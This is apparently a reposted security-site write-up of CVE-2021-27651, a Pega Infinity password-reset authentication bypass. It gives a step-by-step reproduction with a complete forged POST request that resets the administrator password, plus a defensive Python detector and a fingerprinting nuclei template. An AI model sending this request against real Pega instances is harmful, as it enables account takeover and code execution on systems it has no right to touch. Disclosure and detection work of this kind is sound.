Pega Infinity - Authentication Bypass [CVE-2021-27651]

admin, 2025-04-24 15:32:08
Disclaimer

The content we publish is provided solely for testing, learning and exchange; use in unauthorized scenarios is prohibited. Nobody may use it for illegal purposes. We accept no legal responsibility for consequences arising from the techniques described in this article.

---> Vulnerability description

Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass: the password reset function for local accounts can be used to bypass local authentication checks.

Vulnerability overview

Name:        Pega Infinity - Authentication Bypass
CVE ID:      CVE-2021-27651
Disclosed:   2021
Severity:    Critical
Score:       9.8
PoC public:
EXP public:

---> Affected versions

Pega Infinity >= 8.2.1 and <= 8.5.2

---> Vulnerability details

An attacker can bypass every stage of the password reset flow and reset any user's account on Pega Infinity. This is done by (1) initiating the password reset flow and entering the victim's email address, then (2) forcing through the HTTP POST request that updates the password, without completing the confirmation step. The attacker can then log in with the newly set password and fully compromise the Pega instance through the many post-authentication code execution vectors available to an administrator (modifying dynamic pages, templating, etc.).
---> Reproduction

1. Browse to the login page of any Pega instance.

2. Click "reset password".

3. Enter "administrator@pega.com" and intercept the HTTP request in your proxy. Send the request containing "administrator@pega.com" to the Burp Repeater tab (or an equivalent tool), then let the original request through by disabling interception or clicking "Send".

4. After the initial request has gone through, modify the request body in Repeater so the request looks like the following (":PEGA_ID" is a per-site unique ID of the form ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W; "yourCookie" is the session cookie from your own browser):

POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=

(The Content-Length of 112 matches the body above exactly; adjust it if you change the password value.)

5. After sending the request, the confirmation part of the password reset has been bypassed and the administrator account's password is now the one you supplied. Log in with the following credentials:

administrator@pega.com / Rules@1234
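The following is an added example, not code from the original post or from Pega: a small offline helper that (a) checks whether a reported Pega Infinity version falls in the affected range quoted above and (b) scans captured HTTP requests for the signature of the forced password-change POST from step 4, i.e. a guest-authenticated POST to the PRServlet path whose body sets NewPassword and invokes Code-Security.pzChangeUserPassword. The sample requests at the bottom are constructed for this example (the login-form field names in the second one are an assumption), and the third one is the unauthenticated API docs path used by the nuclei fingerprint later on the page, which the detector correctly leaves alone.

```python
"""Offline helpers for CVE-2021-27651 (added example, not the post's own code)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Affected range stated in the advisory: 8.2.1 <= version <= 8.5.2
AFFECTED_MIN = (8, 2, 1)
AFFECTED_MAX = (8, 5, 2)

# Activity invoked by the forced password-change POST in the write-up.
CHANGE_PASSWORD_ACTIVITY = "Code-Security.pzChangeUserPassword"

# /prweb/PRServlet/app/<app>/<PEGA_ID>*/!STANDARD ; the ID is per-site, so match any value.
PRSERVLET_RE = re.compile(r"^/prweb/PRServlet/app/[^/]+/[^/]+\*/!STANDARD(\?.*)?$")


def parse_version(text: str) -> tuple[int, int, int]:
    """Turn '8.4.1' (or a shorter '8.4') into a comparable 3-tuple."""
    parts = [int(p) for p in text.strip().split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def is_affected(version: str) -> bool:
    """True when the version lies inside the vulnerable range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


@dataclass(frozen=True)
class HttpRequest:
    method: str
    path: str
    body: str = ""


def body_activities(body: str) -> list[str]:
    """Return every pyActivity value in a form-encoded body.

    The body in the write-up encodes the whole string
    'pyActivity=Code-Security.pzChangeUserPassword' as one key with an empty
    value (the '=' is sent as %3D); a plainer encoding would be a normal
    pyActivity=... pair. Both forms are accepted here.
    """
    params = parse_qs(body, keep_blank_values=True)
    found: list[str] = []
    for key, values in params.items():
        if key == "pyActivity":
            found.extend(values)
        elif key.startswith("pyActivity="):
            found.append(key.split("=", 1)[1])
    return found


def is_reset_bypass_attempt(req: HttpRequest) -> bool:
    """Flag a guest-authenticated POST that sets a new password via the change-password activity."""
    if req.method.upper() != "POST" or not PRSERVLET_RE.match(req.path):
        return False
    params = parse_qs(req.body, keep_blank_values=True)
    guest_session = "guest" in params.get("pzAuth", [])
    sets_password = "NewPassword" in params
    return guest_session and sets_password and CHANGE_PASSWORD_ACTIVITY in body_activities(req.body)


def scan(requests: list[HttpRequest]) -> list[HttpRequest]:
    """Return the subset of requests that look like CVE-2021-27651 exploitation."""
    return [r for r in requests if is_reset_bypass_attempt(r)]


# Constructed sample traffic. The first body is the one shown in step 4 above;
# the second is an assumed ordinary login-form POST; the third is the
# unauthenticated API docs endpoint used for fingerprinting.
SAMPLE_REQUESTS = [
    HttpRequest("POST", "/prweb/PRServlet/app/default/ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W*/!STANDARD",
                "pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234"
                "&pyActivity%3DCode-Security.pzChangeUserPassword="),
    HttpRequest("POST", "/prweb/PRServlet/app/default/ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W*/!STANDARD",
                "UserIdentifier=alice%40example.com&Password=s3cret"),
    HttpRequest("GET", "/prweb/PRRestService/unauthenticatedAPI/v1/docs"),
]

if __name__ == "__main__":
    for ver in ("8.2.0", "8.2.1", "8.4", "8.5.2", "8.5.3"):
        print(f"{ver:>6}: {'affected' if is_affected(ver) else 'not affected'}")
    for hit in scan(SAMPLE_REQUESTS):
        print("suspicious:", hit.method, hit.path)
```

The detector keys on pzAuth=guest together with the change-password activity, which is what distinguishes the bypass from a user changing their own password inside an authenticated session; if your instance legitimately accepts that activity from guest sessions, expect false positives and tighten the rule to your environment.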
[Screenshot: Password bypass]

[Screenshot: Remote code execution via shell upload]
---> PoC

The nuclei template below (author sshell) only fingerprints Pega Infinity: it requests the unauthenticated API documentation endpoint and matches the string "Pega API". It identifies hosts that run Pega and does not exploit the bypass itself, hence its "low" severity.

id: pegainfo

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
---> Exploit Video

Originally published on the WeChat public account 偏远酒馆: Pega Infinity - Authentication Bypass [CVE-2021-27651]

Disclaimer: The programs (methods) described in this article may be offensive in nature and are provided only for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. If you have questions, contact us by email (a corporate or otherwise valid mailbox is recommended to avoid the message being filtered; contact details are on the home page).
Reposted from CN-SEC 中文网 (please keep this link when reposting, with thanks to the original author): Pega Infinity - Authentication Bypass [CVE-2021-27651] https://cn-sec.com/archives/3994661.html
